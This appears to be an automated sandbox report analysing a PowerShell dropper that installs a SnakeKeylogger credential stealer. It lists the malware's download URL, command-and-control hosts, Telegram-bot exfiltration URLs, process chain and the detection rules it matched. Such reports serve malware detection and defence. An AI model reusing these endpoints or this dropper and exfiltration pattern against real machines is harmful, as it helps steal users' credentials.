                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 10:00:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: x.exe, 00000004.00000002.1321698645.000000000326E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1321698645.000000000327E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3
                      Source: x.exe, 00000004.00000002.1321698645.0000000003209000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1321698645.000000000320D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/believe.exe
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.1305409857.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000000.00000002.1305409857.00000000054C1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1321698645.000000000326E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: powershell.exe, 00000000.00000002.1305409857.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: powershell.exe, 00000000.00000002.1305409857.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:721680%0D%0ADate%20a
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: x.exe, 00000005.00000002.3755929161.0000000002902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: x.exe, 00000005.00000002.3755929161.00000000028F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en(
                      Source: x.exe, 00000005.00000002.3755929161.0000000002902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20R
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: powershell.exe, 00000000.00000002.1305409857.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.1315075675.0000000006526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000005.00000002.3755929161.000000000282F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: x.exe, 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000027BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: x.exe, 00000005.00000002.3755929161.000000000282F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000027E9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                      Source: x.exe, 00000005.00000002.3765281336.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: x.exe, 00000005.00000002.3755929161.0000000002933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: x.exe, 00000005.00000002.3755929161.0000000002924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(
                      Source: x.exe, 00000005.00000002.3755929161.0000000002933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62154 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62149 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62151 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62149
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:62172 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Powershell drops PE file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018881584_2_01888158
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018808484_2_01880848
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01887AE84_2_01887AE8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01881DD04_2_01881DD0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018898104_2_01889810
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018808384_2_01880838
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01887AD84_2_01887AD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01881DC04_2_01881DC0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018895D94_2_018895D9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018895E84_2_018895E8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_018897C44_2_018897C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01887EC94_2_01887EC9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEC1475_2_00BEC147
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BED2795_2_00BED279
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE53425_2_00BE5342
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEC4735_2_00BEC473
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEC7385_2_00BEC738
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE69A15_2_00BE69A1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEE9885_2_00BEE988
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BECA095_2_00BECA09
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BECCD95_2_00BECCD9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE3E095_2_00BE3E09
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BECFA95_2_00BECFA9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE6FC85_2_00BE6FC8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE537B5_2_00BE537B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE29E05_2_00BE29E0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEE97F5_2_00BEE97F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEF9745_2_00BEF974
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll ACD44760A750AFD0DB17EC0B55BD092372AA0FE827B90B891B6B8C19638174F6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\x.exe B4FB5FC5D928C980DD59CC6035D3A62F2141AE96EF42C6E839FD86F45BA40039
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 4.2.x.exe.4a696b8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.3753058787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000004.00000002.1322785620.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: x.exe PID: 4292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: x.exe PID: 5156, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.x.exe.4a696b8.3.raw.unpack, --.csBase64 encoded string: 'QMP5+Zav3OUq9OOcYs5CdQwVhfNast3/xEa0tVdiWYy4PoureKQ0hNBDRbWFjees'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@7/7@3/4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbxfjpmq.ti4.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: x.exe, 00000005.00000002.3755929161.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3755929161.00000000029F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: believe.ps1Virustotal: Detection: 29%
                      Source: believe.ps1ReversingLabs: Detection: 31%
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\believe.ps1"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
